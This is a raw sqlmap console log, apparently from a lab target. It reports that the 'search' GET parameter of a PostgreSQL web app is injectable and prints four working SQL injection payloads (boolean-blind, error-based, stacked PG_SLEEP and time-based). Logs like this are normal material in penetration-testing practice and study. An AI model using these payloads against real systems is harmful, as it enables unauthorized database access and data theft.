        ___
       __H__
 ___ ___["]_____ ___ ___  {1.5.8#stable}
|_ -| . [(]     | .'| . |
|___|_  [)]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:28:07 /2021-12-28/

[11:28:08] [INFO] testing connection to the target URL
[11:28:08] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:28:08] [INFO] testing if the target URL content is stable
[11:28:09] [INFO] target URL content is stable
[11:28:09] [INFO] testing if GET parameter 'search' is dynamic
[11:28:09] [WARNING] GET parameter 'search' does not appear to be dynamic
[11:28:10] [INFO] heuristic (basic) test shows that GET parameter 'search' might be injectable (possible DBMS: 'PostgreSQL')
[11:28:10] [INFO] testing for SQL injection on GET parameter 'search'
it looks like the back-end DBMS is 'PostgreSQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 
for the remaining tests, do you want to include all tests for 'PostgreSQL' extending provided level (1) and risk (1) values? [Y/n] 
[11:28:48] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:28:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[11:28:51] [INFO] testing 'Generic inline queries'
[11:28:51] [INFO] testing 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)'
[11:28:53] [INFO] GET parameter 'search' appears to be 'PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)' injectable 
[11:28:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[11:28:53] [INFO] GET parameter 'search' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable 
[11:28:53] [INFO] testing 'PostgreSQL inline queries'
[11:28:54] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[11:28:54] [WARNING] time-based comparison requires larger statistical model, please wait..... (done)                                
[11:29:05] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 stacked queries (comment)' injectable 
[11:29:05] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[11:29:16] [INFO] GET parameter 'search' appears to be 'PostgreSQL > 8.1 AND time-based blind' injectable 
[11:29:16] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
GET parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 34 HTTP(s) requests:
---
Parameter: search (GET)
    Type: boolean-based blind
    Title: PostgreSQL AND boolean-based blind - WHERE or HAVING clause (CAST)
    Payload: search=any query' AND (SELECT (CASE WHEN (4309=4309) THEN NULL ELSE CAST((CHR(101)||CHR(97)||CHR(108)||CHR(100)) AS NUMERIC) END)) IS NULL-- buad

    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: search=any query' AND 4362=CAST((CHR(113)||CHR(113)||CHR(106)||CHR(120)||CHR(113))||(SELECT (CASE WHEN (4362=4362) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(113)||CHR(98)||CHR(122)||CHR(113)) AS NUMERIC)-- zpMu

    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries (comment)
    Payload: search=any query';SELECT PG_SLEEP(5)--

    Type: time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: search=any query' AND 5107=(SELECT 5107 FROM PG_SLEEP(5))-- dplm
---
[11:29:47] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu 20.04 or 19.10 (eoan or focal)
web application technology: Apache 2.4.41
back-end DBMS: PostgreSQL
[11:29:48] [INFO] fetched data logged to text files under '/home/divu050704/.local/share/sqlmap/output/10.129.78.227'

[*] ending @ 11:29:48 /2021-12-28/

